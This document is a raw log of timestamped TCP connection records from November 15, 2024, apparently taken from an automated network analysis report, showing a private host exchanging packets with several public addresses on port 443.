                                                                                                            Nov 15, 2024 11:24:38.649159908 CET49773443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:38.649486065 CET49773443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:38.650283098 CET44349775142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:38.650374889 CET49775443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:38.650778055 CET44349774142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:38.650854111 CET49774443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:38.651871920 CET44349774142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:38.651946068 CET49774443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:38.653301001 CET49774443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:38.653301001 CET49775443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:38.653316975 CET44349774142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:38.653352022 CET44349775142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:38.653661966 CET44349774142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:38.653738022 CET49774443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:38.653762102 CET44349775142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:38.653844118 CET49775443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:38.654129982 CET49774443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:38.654129982 CET49775443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:38.655455112 CET44349772142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:38.691410065 CET44349773142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:38.695327997 CET44349774142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:38.699328899 CET44349775142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:38.975094080 CET44349772142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:38.975186110 CET49772443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:38.975219011 CET44349772142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:38.975287914 CET49772443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:38.975359917 CET49772443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:38.975419044 CET44349772142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:38.975615025 CET49772443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:38.975974083 CET49777443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:38.976072073 CET44349777142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:38.976185083 CET49777443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:38.976424932 CET49777443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:38.976458073 CET44349777142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.409786940 CET44349774142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.411497116 CET49774443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:39.411561012 CET44349774142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.414875031 CET49774443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:39.416378021 CET49774443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:39.416503906 CET44349774142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.416750908 CET49774443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:39.418617010 CET49778443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:39.418716908 CET44349778142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.418927908 CET49778443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:39.431828976 CET49778443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:39.431884050 CET44349778142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.528533936 CET44349775142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.528762102 CET44349775142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.528872013 CET49775443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:39.528951883 CET44349775142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.529028893 CET49775443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:39.536465883 CET49775443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:39.536540031 CET44349775142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.536618948 CET49775443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:39.537353039 CET49779443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:39.537401915 CET44349779142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.537679911 CET49779443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:39.537902117 CET49779443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:39.537916899 CET44349779142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.688405037 CET44349773142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.688644886 CET44349773142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.688747883 CET49773443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:39.688812971 CET44349773142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.688997030 CET49773443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:39.689570904 CET49773443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:39.689630985 CET44349773142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.689707041 CET49773443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:39.690088034 CET49780443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:39.690159082 CET44349780142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.690274000 CET49780443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:39.690490007 CET49780443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:39.690512896 CET44349780142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.810830116 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:39.810899973 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.810996056 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:39.811336040 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:39.811352968 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.835427999 CET44349777142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.835555077 CET49777443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:39.836514950 CET44349777142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.836587906 CET49777443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:39.840462923 CET49777443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:39.840490103 CET44349777142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.841005087 CET44349777142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:39.841078997 CET49777443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:39.841510057 CET49777443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:39.883347988 CET44349777142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.200953007 CET44349777142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.201128006 CET49777443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.201159000 CET44349777142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.201262951 CET49777443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.201338053 CET49777443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.201396942 CET44349777142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.201472998 CET49777443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.202083111 CET49782443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.202176094 CET44349782142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.202287912 CET49782443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.202620029 CET49782443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.202649117 CET44349782142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.295650959 CET44349778142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.295782089 CET49778443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.296727896 CET44349778142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.296794891 CET49778443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.299396992 CET49778443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.299420118 CET44349778142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.299782038 CET44349778142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.299856901 CET49778443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.300312996 CET49778443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.343346119 CET44349778142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.382595062 CET44349779142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.382733107 CET49779443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:40.387358904 CET49779443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:40.387408018 CET44349779142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.388154030 CET44349779142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.388350010 CET49779443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:40.388791084 CET49779443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:40.435338974 CET44349779142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.531570911 CET44349780142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.531795025 CET49780443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:40.533458948 CET49780443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:40.533485889 CET44349780142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.533855915 CET44349780142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.533915043 CET49780443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:40.534410000 CET49780443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:40.544842958 CET49782443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.544864893 CET49778443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.544904947 CET49779443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:40.544998884 CET49780443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:40.556026936 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.556227922 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:40.557569027 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:40.557621956 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.558371067 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.559629917 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:40.603348017 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.644965887 CET49784443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.645001888 CET44349784142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.645067930 CET49784443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.645319939 CET49785443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:40.645327091 CET44349785142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.645378113 CET49785443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:40.645580053 CET49784443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.645591021 CET44349784142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.645704985 CET49785443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:40.645714998 CET44349785142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.646217108 CET49786443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.646224022 CET44349786142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.646267891 CET49786443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.646409988 CET49786443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:40.646424055 CET44349786142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.806065083 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.806133032 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.806175947 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.806348085 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:40.806385040 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.806437016 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:40.806437016 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:40.924062967 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.924102068 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.924282074 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:40.924282074 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:40.924319983 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:40.924575090 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.040901899 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.040930986 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.041023016 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.041093111 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.041136026 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.041157961 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.158970118 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.159007072 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.159107924 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.159109116 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.159173965 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.159255028 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.275770903 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.275804043 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.275881052 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.275914907 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.275938988 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.275963068 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.392803907 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.392837048 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.392894030 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.392916918 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.392934084 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.392957926 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.497709036 CET44349785142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.497781038 CET49785443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:41.498336077 CET49785443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:41.498343945 CET44349785142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.498565912 CET49785443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:41.498570919 CET44349785142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.509622097 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.509651899 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.509743929 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.509812117 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.509886026 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.509886026 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.510792971 CET44349784142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.510860920 CET49784443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.511337042 CET49784443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.511339903 CET44349784142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.512962103 CET49784443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.512965918 CET44349784142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.521882057 CET44349786142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.521944046 CET49786443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.522253036 CET49786443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.522257090 CET44349786142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.522437096 CET49786443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.522442102 CET44349786142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.627163887 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.627230883 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.627281904 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.627372026 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.627420902 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.627444983 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.673623085 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.673656940 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.673700094 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.673712969 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.673732042 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.673748970 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.749588013 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.749610901 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.749670982 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.749680042 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.749706984 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.749727964 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.863177061 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.863209009 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.863301992 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.863337994 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.863382101 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.879836082 CET44349784142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.879904032 CET49784443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.879914999 CET44349784142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.879956961 CET49784443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.880052090 CET49784443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.880079985 CET44349784142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.880121946 CET49784443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.880775928 CET49789443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:41.880812883 CET44349789142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.880897999 CET49789443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:41.881156921 CET49789443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:41.881166935 CET44349789142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.881552935 CET49790443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.881560087 CET44349790142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.881624937 CET49790443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.881994963 CET49790443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.882002115 CET44349790142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.906727076 CET44349785142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.906816959 CET49785443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:41.906832933 CET44349785142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.906871080 CET49785443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:41.907051086 CET44349785142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.907088995 CET49785443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:41.907095909 CET44349785142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.907126904 CET49785443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:41.910186052 CET44349786142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.910192966 CET49785443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:41.910244942 CET44349785142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.910258055 CET49786443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.910264969 CET44349786142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.910315990 CET49785443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:41.910377026 CET49786443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.910377026 CET49785443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:41.911343098 CET49786443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.911376953 CET44349786142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.911420107 CET49786443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.912058115 CET49791443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:41.912082911 CET44349791142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.912142038 CET49791443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:41.912316084 CET49792443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.912338018 CET44349792142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.912379026 CET49792443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.912556887 CET49792443192.168.2.16142.250.185.78
                                                                                                            Nov 15, 2024 11:24:41.912565947 CET44349792142.250.185.78192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.912786007 CET49791443192.168.2.16142.250.185.65
                                                                                                            Nov 15, 2024 11:24:41.912792921 CET44349791142.250.185.65192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.979011059 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.979043961 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.979154110 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:41.979182959 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:41.979227066 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.026385069 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.026417971 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.026510954 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.026530027 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.026571035 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.098978996 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.099049091 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.099104881 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.099174023 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.099214077 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.099235058 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.405639887 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.405673027 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.405721903 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.405750990 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.405785084 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.405803919 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.405831099 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.410171032 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.410216093 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.410250902 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.410264969 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.410295963 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.410330057 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.414233923 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.414284945 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.414344072 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.414361000 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.414385080 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.414424896 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.419735909 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.419780016 CET4434978113.107.246.45192.168.2.16
                                                                                                            Nov 15, 2024 11:24:42.419815063 CET49781443192.168.2.1613.107.246.45
                                                                                                            Nov 15, 2024 11:24:42.419833899 CET4434978113.107.246.45192.168.2.16
